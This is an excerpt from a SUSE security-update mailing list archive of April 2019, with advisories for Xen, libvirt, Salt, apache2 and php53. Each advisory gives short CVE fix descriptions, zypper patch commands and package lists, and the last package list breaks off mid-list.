- Fixed multiple access violations introduced by the XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192).
- Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest, and potentially thereby to that of the guest operating system (bsc#1126201).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126197).
- Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables, leading to privilege escalation (bsc#1126195).
- Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126196).
- Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400).
- Fixed an issue which could allow malicious or buggy guests with passed-through PCI devices to escalate their privileges, crash the host, or access data belonging to other guests. Additionally, memory leaks were also possible (bsc#1126140).
- Fixed a race condition which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141).
Other issues fixed:

- Upstream bug fixes (bsc#1027519)
- Fixed an issue where setup of grant_tables and other variables may fail (bsc#1126325).
- Added a requirement for xen, xl.cfg firmware="pvgrub32|pvgrub64 (bsc#1127620).
- Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for HVM domUs (bsc#1026236).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Server Applications 15:
  zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-875=1
- SUSE Linux Enterprise Module for Basesystem 15:
  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-875=1

Package List:

- SUSE Linux Enterprise Module for Server Applications 15 (x86_64):
  xen-4.10.3_02-3.14.1
  xen-debugsource-4.10.3_02-3.14.1
  xen-devel-4.10.3_02-3.14.1
  xen-tools-4.10.3_02-3.14.1
  xen-tools-debuginfo-4.10.3_02-3.14.1
- SUSE Linux Enterprise Module for Basesystem 15 (x86_64):
  xen-debugsource-4.10.3_02-3.14.1
  xen-libs-4.10.3_02-3.14.1
  xen-libs-debuginfo-4.10.3_02-3.14.1
  xen-tools-domU-4.10.3_02-3.14.1
  xen-tools-domU-debuginfo-4.10.3_02-3.14.1

References:
https://www.suse.com/security/cve/CVE-2018-19967.html
https://bugzilla.suse.com/1026236
https://bugzilla.suse.com/1027519
https://bugzilla.suse.com/1114988
https://bugzilla.suse.com/1126140
https://bugzilla.suse.com/1126141
https://bugzilla.suse.com/1126192
https://bugzilla.suse.com/1126195
https://bugzilla.suse.com/1126196
https://bugzilla.suse.com/1126197
https://bugzilla.suse.com/1126198
https://bugzilla.suse.com/1126201
https://bugzilla.suse.com/1126325
https://bugzilla.suse.com/1127400
https://bugzilla.suse.com/1127620

From sle-security-updates at lists.suse.com Thu Apr 4 16:24:33 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 00:24:33 +0200 (CEST)
Subject: SUSE-SU-2019:0553-1:
moderate: Security update for libvirt
Message-ID: <20190404222433.EF6D4FF2D@maintenance.suse.de>

SUSE Security Update: Security update for libvirt
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0553-1
Rating: moderate
References: #1104662 #1120813 #1127458
Cross-References: CVE-2019-3840
Affected Products:
  SUSE OpenStack Cloud 7
  SUSE Linux Enterprise Server for SAP 12-SP2
  SUSE Linux Enterprise Server 12-SP2-LTSS
  SUSE Linux Enterprise Server 12-SP2-BCL
  SUSE Enterprise Storage 4
______________________________________________________________________________

An update that solves one vulnerability and has two fixes is now available.

Description:

This update for libvirt fixes the following issues:

Security issues fixed:

- CVE-2019-3840: Fixed a NULL pointer dereference vulnerability in the virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458).

Other issues fixed:

- libxl: save current memory value after successful balloon (bsc#1120813).
- spec: Don't restart libvirt-guests when updating libvirt-client (bsc#1104662).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-553=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-553=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-553=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-553=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-553=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE OpenStack Cloud 7 (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 
libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 
libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 
libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Enterprise Storage 4 (x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 
libvirt-daemon-qemu-2.0.0-27.48.1
libvirt-daemon-xen-2.0.0-27.48.1
libvirt-debugsource-2.0.0-27.48.1
libvirt-doc-2.0.0-27.48.1
libvirt-lock-sanlock-2.0.0-27.48.1
libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1
libvirt-nss-2.0.0-27.48.1
libvirt-nss-debuginfo-2.0.0-27.48.1

References:
https://www.suse.com/security/cve/CVE-2019-3840.html
https://bugzilla.suse.com/1104662
https://bugzilla.suse.com/1120813
https://bugzilla.suse.com/1127458

From sle-security-updates at lists.suse.com Thu Apr 4 19:09:53 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 03:09:53 +0200 (CEST)
Subject: SUSE-SU-2019:0882-1: moderate: Security update for Salt
Message-ID: <20190405010953.60B40FF2D@maintenance.suse.de>

SUSE Security Update: Security update for Salt
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0882-1
Rating: moderate
References: #1114029 #1122680 #1125015
Cross-References: CVE-2018-15750 CVE-2018-15751
Affected Products:
  SUSE Manager Tools 15-BETA
______________________________________________________________________________

An update that solves two vulnerabilities and has one errata is now available.

Description:

This update fixes the following issues:

salt:

- Removing patch to add root parameter to zypper module
- Patch modification due to offset caused by previous patch removal
- Fix for -t parameter in mount module
- Async batch implementation
- Update to 2019.2 release
- Add virt.volume_infos and virt.volume_delete functions
- Bugfix: properly refresh pillars (bsc#1125015)
- Removes version from python3 requirement completely
- Alignment with Salt 2019.2.0 RC2 from upstream.
- Update to 2019.2.0~rc2
- Add virt.all_capabilities to return all host and domain capabilities at once
- Don't call zypper with more than one --no-refresh (PR#51382)
- Switch to better version nomenclature. Using ~ for the rc1 suffix.
- Add "id_" and "force" to the whitelist of the API check
- Add metadata to accepted keyword arguments (bsc#1122680)
- Fix "pkg.list_pkgs" output when using "attr" to take the arch into account (bsc#1114029)
- Update Salt to 2019.2.0rc1

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Manager Tools 15-BETA:
  zypper in -t patch SUSE-SLE-Manager-Tools-15-BETA-2019-882=1

Package List:

- SUSE Manager Tools 15-BETA (aarch64 ppc64le s390x x86_64):
  python2-salt-2019.2.0-8.3.3
  python3-salt-2019.2.0-8.3.3
  salt-2019.2.0-8.3.3
  salt-doc-2019.2.0-8.3.3
  salt-minion-2019.2.0-8.3.3

- SUSE Manager Tools 15-BETA (noarch):
  salt-bash-completion-2019.2.0-8.3.3
  salt-zsh-completion-2019.2.0-8.3.3

References:

https://www.suse.com/security/cve/CVE-2018-15750.html
https://www.suse.com/security/cve/CVE-2018-15751.html
https://bugzilla.suse.com/1114029
https://bugzilla.suse.com/1122680
https://bugzilla.suse.com/1125015

From sle-security-updates at lists.suse.com Thu Apr 4 19:11:02 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 03:11:02 +0200 (CEST)
Subject: SUSE-SU-2019:0881-1: moderate: Security update for Salt
Message-ID: <20190405011102.75468FF2D@maintenance.suse.de>

SUSE Security Update: Security update for Salt
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0881-1
Rating: moderate
References: #1114029 #1122680 #1125015
Cross-References: CVE-2018-15750 CVE-2018-15751
Affected Products:
- SUSE Manager Tools 12-BETA
______________________________________________________________________________

An update that solves two vulnerabilities and has one erratum is now available.
Description:

This update fixes the following issues:

salt:

- Removing patch to add root parameter to zypper module
- Patch modification due to offset caused by previous patch removal
- Fix for -t parameter in mount module
- Async batch implementation
- Update to 2019.2 release
- Add virt.volume_infos and virt.volume_delete functions
- Bugfix: properly refresh pillars (bsc#1125015)
- Removes version from python3 requirement completely
- Alignment with Salt 2019.2.0 RC2 from upstream.
- Update to 2019.2.0~rc2
- Add virt.all_capabilities to return all host and domain capabilities at once
- Don't call zypper with more than one --no-refresh (PR#51382)
- Switch to better version nomenclature. Using ~ for the rc1 suffix.
- Add "id_" and "force" to the whitelist of the API check
- Add metadata to accepted keyword arguments (bsc#1122680)
- Fix "pkg.list_pkgs" output when using "attr" to take the arch into account (bsc#1114029)
- Update Salt to 2019.2.0rc1

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Manager Tools 12-BETA:
  zypper in -t patch SUSE-SLE-Manager-Tools-12-BETA-2019-881=1

Package List:

- SUSE Manager Tools 12-BETA (aarch64 ppc64le s390x x86_64):
  libzmq3-4.0.4-18.2.1
  libzmq3-debuginfo-4.0.4-18.2.1
  python-MarkupSafe-0.18-6.3.1
  python-MarkupSafe-debuginfo-0.18-6.3.1
  python-MarkupSafe-debugsource-0.18-6.3.1
  python-PyYAML-3.12-29.2.1
  python-PyYAML-debuginfo-3.12-29.2.1
  python-PyYAML-debugsource-3.12-29.2.1
  python-msgpack-python-0.4.6-11.2.1
  python-msgpack-python-debuginfo-0.4.6-11.2.1
  python-msgpack-python-debugsource-0.4.6-11.2.1
  python-psutil-5.2.2-18.2.1
  python-psutil-debuginfo-5.2.2-18.2.1
  python-psutil-debugsource-5.2.2-18.2.1
  python-pycrypto-2.6.1-13.2.1
  python-pyzmq-14.0.0-12.2.1
  python-pyzmq-debuginfo-14.0.0-12.2.1
  python-pyzmq-debugsource-14.0.0-12.2.1
  python-tornado-4.2.1-20.2.1
  python-tornado-debuginfo-4.2.1-20.2.1
  python-tornado-debugsource-4.2.1-20.2.1
  python2-salt-2019.2.0-49.3.8
  python3-MarkupSafe-0.18-6.3.1
  python3-PyYAML-3.12-29.2.1
  python3-msgpack-python-0.4.6-11.2.1
  python3-psutil-5.2.2-18.2.1
  python3-pycrypto-2.6.1-13.2.1
  python3-pyzmq-14.0.0-12.2.1
  python3-salt-2019.2.0-49.3.8
  python3-tornado-4.2.1-20.2.1
  salt-2019.2.0-49.3.8
  salt-doc-2019.2.0-49.3.8
  salt-minion-2019.2.0-49.3.8
  zeromq-debugsource-4.0.4-18.2.1

- SUSE Manager Tools 12-BETA (ppc64le s390x x86_64):
  python-pycrypto-debuginfo-2.6.1-13.2.1

- SUSE Manager Tools 12-BETA (noarch):
  python-Jinja2-2.8-22.2.1
  python-futures-3.0.2-18.2.1
  python-requests-2.11.1-9.2.1
  python3-Jinja2-2.8-22.2.1
  python3-requests-2.11.1-9.2.1

References:

https://www.suse.com/security/cve/CVE-2018-15750.html
https://www.suse.com/security/cve/CVE-2018-15751.html
https://bugzilla.suse.com/1114029
https://bugzilla.suse.com/1122680
https://bugzilla.suse.com/1125015

From sle-security-updates at lists.suse.com Fri Apr 5 04:13:46 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 12:13:46 +0200 (CEST)
Subject: SUSE-SU-2019:0888-1: important: Security update for apache2
Message-ID: <20190405101346.B54BEFF2D@maintenance.suse.de>

SUSE Security Update: Security update for apache2
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0888-1
Rating: important
References: #1122839 #1131239 #1131241
Cross-References: CVE-2018-17199 CVE-2019-0217 CVE-2019-0220
Affected Products:
- SUSE Linux Enterprise Server 12-SP1-LTSS
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for apache2 fixes the following issues:

- CVE-2018-17199: A bug in Apache's "mod_session_cookie" led to the module not respecting a cookie's expiry time. [bsc#1122839]
- CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to bypass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241]
- CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239]

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server 12-SP1-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-888=1

Package List:

- SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):
  apache2-2.4.16-20.24.1
  apache2-debuginfo-2.4.16-20.24.1
  apache2-debugsource-2.4.16-20.24.1
  apache2-example-pages-2.4.16-20.24.1
  apache2-prefork-2.4.16-20.24.1
  apache2-prefork-debuginfo-2.4.16-20.24.1
  apache2-utils-2.4.16-20.24.1
  apache2-utils-debuginfo-2.4.16-20.24.1
  apache2-worker-2.4.16-20.24.1
  apache2-worker-debuginfo-2.4.16-20.24.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (noarch):
  apache2-doc-2.4.16-20.24.1

References:

https://www.suse.com/security/cve/CVE-2018-17199.html
https://www.suse.com/security/cve/CVE-2019-0217.html
https://www.suse.com/security/cve/CVE-2019-0220.html
https://bugzilla.suse.com/1122839
https://bugzilla.suse.com/1131239
https://bugzilla.suse.com/1131241

From sle-security-updates at lists.suse.com Fri Apr 5 04:15:44 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 12:15:44 +0200 (CEST)
Subject: SUSE-SU-2019:0889-1: important: Security update for apache2
Message-ID: <20190405101544.BDB0BFF2D@maintenance.suse.de>

SUSE Security Update: Security update for apache2
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:0889-1
Rating: important
References: #1122839 #1131239 #1131241
Cross-References: CVE-2018-17199 CVE-2019-0217 CVE-2019-0220
Affected Products:
- SUSE Linux Enterprise Server 12-LTSS
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for apache2 fixes the following issues:

Security issues fixed:

- CVE-2018-17199: A bug in Apache's "mod_session_cookie" led to the module not respecting a cookie's expiry time. [bsc#1122839]
- CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to bypass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241]
- CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239]

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server 12-LTSS:
  zypper in -t patch SUSE-SLE-SERVER-12-2019-889=1

Package List:

- SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):
  apache2-2.4.10-14.36.1
  apache2-debuginfo-2.4.10-14.36.1
  apache2-debugsource-2.4.10-14.36.1
  apache2-example-pages-2.4.10-14.36.1
  apache2-prefork-2.4.10-14.36.1
  apache2-prefork-debuginfo-2.4.10-14.36.1
  apache2-utils-2.4.10-14.36.1
  apache2-utils-debuginfo-2.4.10-14.36.1
  apache2-worker-2.4.10-14.36.1
  apache2-worker-debuginfo-2.4.10-14.36.1

- SUSE Linux Enterprise Server 12-LTSS (noarch):
  apache2-doc-2.4.10-14.36.1

References:

https://www.suse.com/security/cve/CVE-2018-17199.html
https://www.suse.com/security/cve/CVE-2019-0217.html
https://www.suse.com/security/cve/CVE-2019-0220.html
https://bugzilla.suse.com/1122839
https://bugzilla.suse.com/1131239
https://bugzilla.suse.com/1131241

From sle-security-updates at lists.suse.com Fri Apr 5 13:19:18 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 5 Apr 2019 21:19:18 +0200 (CEST)
Subject: SUSE-SU-2019:14013-1: moderate: Security update for php53
Message-ID: <20190405191918.5734A1012B@maintenance.suse.de>

SUSE Security Update: Security update for php53
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:14013-1
Rating: moderate
References: #1126711 #1126713 #1126821 #1126823 #1127122 #1128722 #1128883 #1128886 #1128887 #1128889 #1128892
Cross-References: CVE-2018-20783 CVE-2019-9020 CVE-2019-9021 CVE-2019-9023 CVE-2019-9024 CVE-2019-9637 CVE-2019-9638 CVE-2019-9639 CVE-2019-9640 CVE-2019-9641 CVE-2019-9675
Affected Products:
- SUSE Linux Enterprise Software Development Kit 11-SP4
- SUSE Linux Enterprise Server 11-SP4
- SUSE Linux Enterprise Point of Sale 11-SP3
- SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

An update that fixes 11 vulnerabilities is now available.

Description:

This update for php53 fixes the following issues:

Security issues fixed:

- CVE-2019-9637: Fixed improper implementation of the rename function and multiple invalid memory accesses in the EXIF extension (bsc#1128892).
- CVE-2019-9675: Fixed improper implementation of the rename function and multiple invalid memory accesses in the EXIF extension (bsc#1128886).
- CVE-2019-9638: Fixed improper implementation of the rename function and multiple invalid memory accesses in the EXIF extension (bsc#1128889).
- CVE-2019-9639: Fixed improper implementation of the rename function and multiple invalid memory accesses in the EXIF extension (bsc#1128887).
- CVE-2019-9640: Fixed improper implementation of the rename function and multiple invalid memory accesses in the EXIF extension (bsc#1128883).
- CVE-2019-9024: Fixed a vulnerability in the xmlrpc_decode function which could allow a hostile XMLRPC server to cause memory reads outside the allocated areas (bsc#1126821).
- CVE-2019-9020: Fixed a heap out-of-bounds access in the xmlrpc_decode function (bsc#1126711).
- CVE-2018-20783: Fixed a buffer over-read in the PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1127122).
- CVE-2019-9021: Fixed a heap-based buffer over-read in the PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1126713).
- CVE-2019-9023: Fixed multiple heap-based buffer over-read instances in the mbstring regular expression functions (bsc#1126823).
- CVE-2019-9641: Fixed multiple invalid memory accesses in the EXIF extension and improved the insecure implementation of the rename function (bsc#1128722).

Patch Instructions:

To install this SUSE Security Update, use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Software Development Kit 11-SP4:
  zypper in -t patch sdksp4-php53-14013=1

- SUSE Linux Enterprise Server 11-SP4:
  zypper in -t patch slessp4-php53-14013=1

- SUSE Linux Enterprise Point of Sale 11-SP3:
  zypper in -t patch sleposp3-php53-14013=1

- SUSE Linux Enterprise Debuginfo 11-SP4:
  zypper in -t patch dbgsp4-php53-14013=1

Package List:

- SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64):
  php53-devel-5.3.17-112.58.1
  php53-imap-5.3.17-112.58.1
  php53-posix-5.3.17-112.58.1
  php53-readline-5.3.17-112.58.1
  php53-sockets-5.3.17-112.58.1
  php53-sqlite-5.3.17-112.58.1
  php53-tidy-5.3.17-112.58.1

- SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64):
  apache2-mod_php53-5.3.17-112.58.1
  php53-5.3.17-112.58.1
  php53-bcmath-5.3.17-112.58.1
  php53-bz2-5.3.17-112.58.1
  php53-calendar-5.3.17-112.58.1
  php53-ctype-5.3.17-112.58.1
  php53-curl-5.3.17-112.58.1
  php53-dba-5.3.17-112.58.1
  php53-dom-5.3.17-112.58.1
  php53-exif-5.3.17-112.58.1
  php53-fastcgi-5.3.17-112.58.1
  php53-fileinfo-5.3.17-112.58.1
  php53-ftp-5.3.17-112.58.1
  php53-gd-5.3.17-112.58.1
  php53-gettext-5.3.17-112.58.1
  php53-gmp-5.3.17-112.58.1
